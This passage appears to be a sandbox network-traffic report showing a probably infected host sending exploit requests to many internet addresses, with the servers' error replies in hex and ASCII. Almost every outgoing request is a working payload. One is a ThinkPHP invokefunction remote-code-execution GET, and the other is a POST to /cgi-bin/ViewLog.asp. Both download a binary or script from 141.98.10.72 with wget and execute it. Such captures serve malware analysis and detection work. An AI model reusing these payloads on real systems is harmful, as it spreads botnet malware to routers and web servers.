31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.15	33812	112.223.39.29	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.093985081 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:47.396989107 CET	327	IN	HTTP/1.0 400 Bad Request Date: Wed, 14 Feb 2024 17:29:11 GMT Server: Boa/0.94.14rc19 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>
Feb 14, 2024 09:28:50.404203892 CET	327	IN	HTTP/1.0 400 Bad Request Date: Wed, 14 Feb 2024 17:29:11 GMT Server: Boa/0.94.14rc19 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.15	43794	112.135.211.255	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.121988058 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.15	60120	95.101.201.148	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.570065022 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:47.777223110 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:28:47 GMT Date: Wed, 14 Feb 2024 08:28:47 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 36 66 30 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 32 37 26 23 34 36 3b 34 31 62 38 62 65 37 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.16f01002.1707899327.41b8be78</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.15	45086	95.100.127.15	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.585597992 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:47.808783054 CET	478	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 256 Expires: Wed, 14 Feb 2024 08:28:47 GMT Date: Wed, 14 Feb 2024 08:28:47 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 61 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 32 37 26 23 34 36 3b 64 39 62 61 35 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.3a8e2117.1707899327.d9ba5b</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.15	52484	95.47.167.65	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.589848995 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:47.839899063 CET	364	IN	HTTP/1.1 505 HTTP Version not supported Content-Type: text/html; charset=utf-8 Content-Length: 140 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.15	60806	95.165.139.210	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.591618061 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:47.821935892 CET	115	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.15	52620	95.215.242.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.609966040 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:47.857074022 CET	420	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:28:48 GMT Server: Apache/2.2.15 (CentOS) Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.15	54268	95.86.78.146	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.616647959 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.15	58896	31.136.107.17	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.621190071 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:28:50.715286016 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:28:56.859060049 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:08.891005993 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:33.722174883 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:22.872685909 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.15	49712	31.136.153.210	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.621970892 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:28:48.315314054 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:28:49.691282988 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:28:52.507227898 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:28:58.139240980 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:09.146725893 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:31.674072981 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:16.728756905 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.15	38508	95.143.69.65	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.629456997 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:28:47.840061903 CET	185	IN	HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 1050 Date: Wed, 14 Feb 2024 08:28:47 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.15	57528	95.209.129.238	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.631695986 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.15	38974	31.136.242.67	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.640984058 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:28:50.715275049 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:28:56.859076977 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:08.890830994 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
